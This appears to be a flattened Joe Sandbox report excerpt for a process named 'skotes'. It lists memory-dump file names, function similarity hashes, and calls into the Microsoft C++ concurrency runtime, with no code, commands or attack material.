                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: pEvents
                                                                                                                                                                                                                                              • API String ID: 2141394445-2498624650
                                                                                                                                                                                                                                              • Opcode ID: dafa3d2a81e8b86107815673c78b23da6fdd49912217269c7a4f0471877b9cf8
                                                                                                                                                                                                                                              • Instruction ID: 04752bbad65cab52ee15d8557680687d61c740e4d34cd2b3c8a335419605b0a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dafa3d2a81e8b86107815673c78b23da6fdd49912217269c7a4f0471877b9cf8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05817A31E0029ACBCF24DFAAC981BBEB7F4EF54310F1440A9E511B7282DB34AA45CB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00C026E3
                                                                                                                                                                                                                                                • Part of subcall function 00C024E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C02504
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00C02704
                                                                                                                                                                                                                                              • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00C02711
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00C0275F
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00C027E6
                                                                                                                                                                                                                                              • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00C027F9
                                                                                                                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00C02846
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2530155754-0
                                                                                                                                                                                                                                              • Opcode ID: 7ecd60b2afb5c02ea06c12a9dbd5dbcaeed199d81c6c0f9b265dc6bb66357ed2
                                                                                                                                                                                                                                              • Instruction ID: 2e798bb5f0763293b5393368b03a288dd23d1c0b3afa4f1c03aece7ba3f843bf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ecd60b2afb5c02ea06c12a9dbd5dbcaeed199d81c6c0f9b265dc6bb66357ed2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F881C135900249AFDF16DF94C999BBEBBB5AF45308F044098ED512B2D2C7328E19EB61
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00C02982
                                                                                                                                                                                                                                                • Part of subcall function 00C024E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C02504
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00C029A3
                                                                                                                                                                                                                                              • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00C029B0
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00C029FE
                                                                                                                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00C02AA6
                                                                                                                                                                                                                                              • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00C02AD8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1256429809-0
                                                                                                                                                                                                                                              • Opcode ID: 1713d87e963a5e5eaa5bb00f814abd18f78d41211004692ceb01379a49c87db5
                                                                                                                                                                                                                                              • Instruction ID: 08819eb3035d7a8e317c955a06d7e2fcdc81501f9c85913c140d75d2722d7511
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1713d87e963a5e5eaa5bb00f814abd18f78d41211004692ceb01379a49c87db5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D971A030A00249AFDF15CF54C989BBEBBB5AF55304F044099EC516B2D2CB31DE16EB61
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00BF2876
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00BF28DF
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00BF2913
                                                                                                                                                                                                                                                • Part of subcall function 00BF07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00BF080D
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00BF2993
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00BF29DB
                                                                                                                                                                                                                                                • Part of subcall function 00BF07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00BF07DE
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00BF29EF
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00BF2A00
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00BF2A4D
                                                                                                                                                                                                                                              • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00BF2A7E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
